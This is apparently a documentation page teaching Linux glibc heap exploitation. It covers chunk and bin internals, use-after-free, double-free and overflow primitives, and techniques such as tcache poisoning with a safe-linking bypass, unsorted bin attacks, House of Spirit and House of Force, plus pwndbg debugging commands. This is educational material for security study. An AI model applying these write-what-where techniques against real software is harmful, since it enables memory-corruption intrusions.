Skip to main content
The heap is the dynamic memory region managed by the allocator (malloc/free/realloc). Unlike the stack, it has no fixed layout, making exploitation more complex but also more powerful. The dominant allocator on Linux is ptmalloc2 (glibc), and the techniques in this section target it specifically.

Heap fundamentals

Chunks

Every allocation is wrapped in a chunk — a header plus user data. The header stores the chunk size and status flags.
struct malloc_chunk {
    size_t mchunk_prev_size;  // size of previous chunk if it is free
    size_t mchunk_size;       // size + status flags in lowest 3 bits
    struct malloc_chunk *fd;  // forward pointer (free chunks only)
    struct malloc_chunk *bk;  // backward pointer (free chunks only)
    // large chunks only:
    struct malloc_chunk *fd_nextsize;
    struct malloc_chunk *bk_nextsize;
};
The lowest three bits of mchunk_size are flags:
  • P (bit 0): previous chunk in use
  • M (bit 1): chunk was mmap’d
  • A (bit 2): chunk belongs to a non-main arena

Bins

When chunks are freed they enter bins — linked lists from which the allocator recycles memory.
BinSize rangeStructure
tcache (per-thread, glibc ≥ 2.26)24–1032 bytesSingly-linked, 7 entries max per size
Fast bins16–176 bytesSingly-linked LIFO
Unsorted binAnyDoubly-linked, staging area
Small bins16–1008 bytesDoubly-linked FIFO
Large bins≥1024 bytesDoubly-linked with size ordering

Arenas

In multi-threaded programs, each thread may have its own arena (a separate heap with its own mutex), reducing contention. The main arena expands with brk; secondary arenas use mmap to create subheaps.

Vulnerability primitives

Use-After-Free (UAF)

A UAF occurs when code continues using a pointer after the referenced chunk has been free’d. If an attacker can cause a new allocation to reuse the freed chunk and control its contents, they can manipulate the object’s fields — including virtual-function pointers.
// Simplified UAF
char *buf = malloc(64);
free(buf);
// buf is now in the tcache
char *controlled = malloc(64);  // returns same address as buf
strcpy(controlled, attacker_data);  // overwrites 'buf' region
// if buf is used as an object, vtable pointer is now corrupted
buf->method();  // calls attacker function

Double-Free

Freeing the same chunk twice corrupts the bin’s free list. In older glibc versions without tcache, this directly corrupts the forward/backward pointers. In modern glibc with tcache, a double-free corrupts the next pointer in the tcache bin.
char *a = malloc(64);
free(a);
free(a);  // undefined behaviour — corrupts tcache or fast bin
Detection: glibc now checks tcache_entry->key to detect double-frees within the same bin.

Heap Overflow

Writing past the end of a heap chunk corrupts the next chunk’s header, allowing an attacker to forge the size field or P/M/A flags — which leads to overlapping allocations or controlled writes.

Attack techniques

Overwrite the next pointer of a freed tcache chunk with a target address. The next two malloc() calls of the same size will return:
  1. The poisoned chunk itself
  2. The forged target address — enabling a write-what-where primitive
# Pseudocode for tcache poisoning
a = malloc(0x40)
b = malloc(0x40)
free(b)
free(a)            # tcache list: a -> b

# Overwrite a's next pointer (via overflow or UAF on a)
write(a, p64(target_address ^ (heap_base >> 12)))  # safe-linking bypass

malloc(0x40)       # returns a (pops from list)
evil = malloc(0x40)  # returns target_address
write(evil, data)  # arbitrary write
Since glibc 2.32, tcache pointers are XOR-obfuscated with (ptr >> 12) (safe-linking). A heap address leak is required to compute the correct obfuscated value.
Corrupt the fd pointer of a freed fast bin chunk to point to a fake chunk at a target address. When that fake chunk is allocated, any subsequent write lands at the target.The fake chunk’s size field must fall within the fast bin’s size class and the address must be aligned.
Overwrite the bk pointer of an unsorted bin chunk. When the allocator processes the chunk, it writes main_arena+X to bk->fd, giving a large pointer write-what-where. Typically used to overwrite _IO_list_all or a malloc hook.
Free a crafted (fake) chunk to insert it into a bin. Requirements:
  • The fake chunk’s size matches the target bin class
  • The next fake chunk (at fake + size) has P bit clear and a plausible size
  • The address is returned by the next malloc() of the matching size
Overwrite the top chunk’s size field with 0xffffffffffffffff. The next allocation of size target - heap_base - overhead will return a pointer that points directly into the target memory region.

Heap debugging workflow

# Install pwndbg or GEF for heap-aware GDB
pip install pwndbg

# Inside GDB (pwndbg)
heap             # show all chunks in the main arena
bins             # show all bin free lists
tcachebins       # show per-thread tcache
viscache         # visualise tcache

# Check protections
checksec

Tools for heap exploitation

ToolUse
pwndbgGDB plugin with heap, bins, tcachebins commands
GEFAlternative GDB plugin with heap chunks / heap bins
heaptraceTrace malloc/free calls with call sites
pwntoolsAutomate interaction and payload construction

musl / Alpine notes

The musl mallocng allocator used in Alpine Linux differs significantly from ptmalloc:
  • Allocations live in mmap’d groups organised by size class (stride)
  • Out-of-band metadata with per-group cookies complicates metadata corruption
  • A cycling offset may shift the user-data start by 0x10 bytes on slot reuse — verify with muslheap’s mchunkinfo before tuning offsets
  • Target higher-level objects (e.g., Lua Table->array pointers) rather than allocator metadata
# muslheap GDB plugin
pip install muslheap
# In GDB:
mchunkinfo 0x7ffff7a94e40
When exploiting forking servers, every child inherits the parent’s heap layout and stack canary. A single stable corruption primitive is sufficient — no need to defeat per-execution randomisation.

Build docs developers (and LLMs) love